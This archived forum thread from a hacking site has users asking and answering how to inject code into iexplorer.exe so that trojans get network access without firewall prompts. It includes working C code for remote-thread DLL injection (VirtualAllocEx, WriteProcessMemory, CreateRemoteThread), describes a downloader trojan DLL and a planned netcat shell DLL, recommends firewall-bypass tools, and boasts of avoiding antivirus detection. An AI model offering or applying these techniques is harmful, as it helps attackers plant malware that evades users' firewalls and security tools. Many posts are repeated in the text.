i am wanting to know how do you inject your code or exe so the firewall dosent popup and asked net access when its already accetped for iexplorer.exe . so the apps runs through port 80
Full Version: How To Inject A Exe To Iexplorer.exe
well you cant inject a .exe as far as I know, you can inject a Dynamic Link Library (.dll) though, you need some way of making iexplorer.exe execute a command so your dll can take control
This is very easy to do. See my attached example which i released to the advanced forum a long time ago. It is only POC and I am not interested in comments on mistakes in the code, as it is a rough example.
Disclaimer: This is purely for educational purposes and must not be used for illegal activity. I accept no responsibility for what people do with this code.
Disclaimer: This is purely for educational purposes and must not be used for illegal activity. I accept no responsibility for what people do with this code.
QUOTE
Basically, there are two parts to this. The injection program, and the trojan dll which does the downloading (and execution etc if you want it to).
You will need to change the line: char dll[]="D:\\c backup\\cpp\\system hooks\\test dll\\Release\\test dll.dll";
to fit in with your local drive structure.
Thanks to vnet for his idea on using CreateToolhelp32Snapshot to retrieve the handle to the injected dll, to unload it at the end.
I'm currently working on a netcat shell which lives in a dll to inject via this method.
You will need to change the line: char dll[]="D:\\c backup\\cpp\\system hooks\\test dll\\Release\\test dll.dll";
to fit in with your local drive structure.
Thanks to vnet for his idea on using CreateToolhelp32Snapshot to retrieve the handle to the injected dll, to unload it at the end.
I'm currently working on a netcat shell which lives in a dll to inject via this method.
Its very difficult to inject
Unless u know what u doing
its best u practise in a localarea or some experiemental computer
Unless u know what u doing
its best u practise in a localarea or some experiemental computer
tibbar, Thanks for the Code. 
but you won't pass any firewall with injection, these times are over 
zonealarm asks if the dll should be allowd to access the net.
zonealarm asks if the dll should be allowd to access the net.
hey you gotta find processes or program which have access to use the internet, not all iexplorer process arent allowed
explorer.exe is another good target. also you can try actually injecting into the firewall, keep a list of firewall names, and find which one exists, then inject into that.
well there's a program called zeroadd and it adds bytes to modify...
so you can inject your complete exe code (excluding header) and modify some bytes on the main code to execute this exe...
it even bypasses the firewall since it's a part of the main exe
have fun and be careful what you do with it...
so you can inject your complete exe code (excluding header) and modify some bytes on the main code to execute this exe...
it even bypasses the firewall since it's a part of the main exe
have fun and be careful what you do with it...
ok..injection is on way..
but who to delete the injected file?
black
but who to delete the injected file?
black
QUOTE(blackP0ster @ Dec 10 2004, 03:10 PM)
ok..injection is on way..
but who to delete the injected file?
black
but who to delete the injected file?
black
there is the point, it is hard to restore it, you have to update/reinstall IE... so that's why x1` asked for an exe code injection
injection is tuff and most ifrewalls simply compare the the list of dlls needed and the list of dlls actually used. my suggestion is to use FWB, FireWall Bypass, like optix FWB or bifrost FWB which actually drives code into the core of the exe without ruining it at all this technique requires awesome assembly skills as the brain of the code that ventures around the memory is very complex because it must place code some where safe and continually is moving from empty segment to empty segment.
QUOTE(cool_one @ Dec 10 2004, 06:14 PM)
injection is tuff and most ifrewalls simply compare the the list of dlls needed and the list of dlls actually used. my suggestion is to use FWB, FireWall Bypass, like optix FWB or bifrost FWB which actually drives code into the core of the exe without ruining it at all this technique requires awesome assembly skills as the brain of the code that ventures around the memory is very complex because it must place code some where safe and continually is moving from empty segment to empty segment.
It is actually not hard to do this. You can use WriteProcessMemory to write a function into the another process' memory space, and then CreateRemoteThread to execute this function. This requires no asm skills, only c programming + knowledge of winapi.
Here is an extract from one of my programs that uses this idea:
CODE
// here's the tricky bit. when we inject the function into target process it will not have access to any
// functions via imports since it is not compiled with the process
// instead we must supply function pointer to it, which tell it where to look
// this method relies of the fact that ntdll.dll is loaded into the same place in all processes!
// pointer to RtlInitUnicodeString and LdrLoadDll
FARPROC fPointers[2];
fPointers[0] = GetProcAddress(LoadLibrary("ntdll.dll"), "RtlInitUnicodeString");
fPointers[1] = g_OriginalLdrLoadDll;//GetProcAddress(LoadLibrary("ntdll.dll"), "LdrLoadDll");
void* lpStartAddress = VirtualAllocEx(targetProcessHandle, NULL, functionSize, MEM_COMMIT|MEM_TOP_DOWN|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
SIZE_T numBytesWritten = NULL;
BOOL didWork = WriteProcessMemory(targetProcessHandle, lpStartAddress, &InjectedDllLoader, functionSize, &numBytesWritten);
HANDLE hHandle = CreateRemoteThread(targetProcessHandle, NULL, 0,(LPTHREAD_START_ROUTINE)lpStartAddress, fPointers, 0, &ThreadID);
....
....
void WINAPI InjectedDllLoader(FARPROC functionPointers[2])
{
wchar_t temp[] = L"Secure API Library.dll";
int totalSize = wcslen(temp)*sizeof(wchar_t) + 2*sizeof(USHORT) + 1;
void* dllName = malloc(totalSize);
((RTLINITUNICODESTRING)functionPointers[0])((PUNICODE_STRING)dllName, temp);
DWORD dllHandle = 0;
((LDRLOADDLL)functionPointers[1])(NULL, NULL, (PUNICODE_STRING)dllName, (PVOID*)&dllHandle);
delete pdllName;
}
// functions via imports since it is not compiled with the process
// instead we must supply function pointer to it, which tell it where to look
// this method relies of the fact that ntdll.dll is loaded into the same place in all processes!
// pointer to RtlInitUnicodeString and LdrLoadDll
FARPROC fPointers[2];
fPointers[0] = GetProcAddress(LoadLibrary("ntdll.dll"), "RtlInitUnicodeString");
fPointers[1] = g_OriginalLdrLoadDll;//GetProcAddress(LoadLibrary("ntdll.dll"), "LdrLoadDll");
void* lpStartAddress = VirtualAllocEx(targetProcessHandle, NULL, functionSize, MEM_COMMIT|MEM_TOP_DOWN|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
SIZE_T numBytesWritten = NULL;
BOOL didWork = WriteProcessMemory(targetProcessHandle, lpStartAddress, &InjectedDllLoader, functionSize, &numBytesWritten);
HANDLE hHandle = CreateRemoteThread(targetProcessHandle, NULL, 0,(LPTHREAD_START_ROUTINE)lpStartAddress, fPointers, 0, &ThreadID);
....
....
void WINAPI InjectedDllLoader(FARPROC functionPointers[2])
{
wchar_t temp[] = L"Secure API Library.dll";
int totalSize = wcslen(temp)*sizeof(wchar_t) + 2*sizeof(USHORT) + 1;
void* dllName = malloc(totalSize);
((RTLINITUNICODESTRING)functionPointers[0])((PUNICODE_STRING)dllName, temp);
DWORD dllHandle = 0;
((LDRLOADDLL)functionPointers[1])(NULL, NULL, (PUNICODE_STRING)dllName, (PVOID*)&dllHandle);
delete pdllName;
}
This is using this concept to write the function InjectedDllLoader into the process space of another process, and then uses CreateRemoteThread to execute it.
search for the dll injection example i posted some time ago, its not picked up by anti virus, you just create a dll file with your code in it and inject it.
Here is some example injection methods:
http://www.codeproject.com/threads/winspy.asp
Here is some example injection methods:
http://www.codeproject.com/threads/winspy.asp
uhh check out http://iamaphex.com he has released heaps of great shit
fwb fwb++ fwb# and yes you can inject an entire exe it isnt that hard all the hard work has been done
fwb fwb++ fwb# and yes you can inject an entire exe it isnt that hard all the hard work has been done
Exe injection cant bypass a firewall either. Sygate Personal Firewall prompts me if any file has changed and wants to access the internet. Whenever i upgrade my internet software this happens. Even when i patched MSN Messenger with polgamy it prompt me and showed where exactly was the file changed. I hope most of the other firewall have this feature aswell.
this injection tools work very hard.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
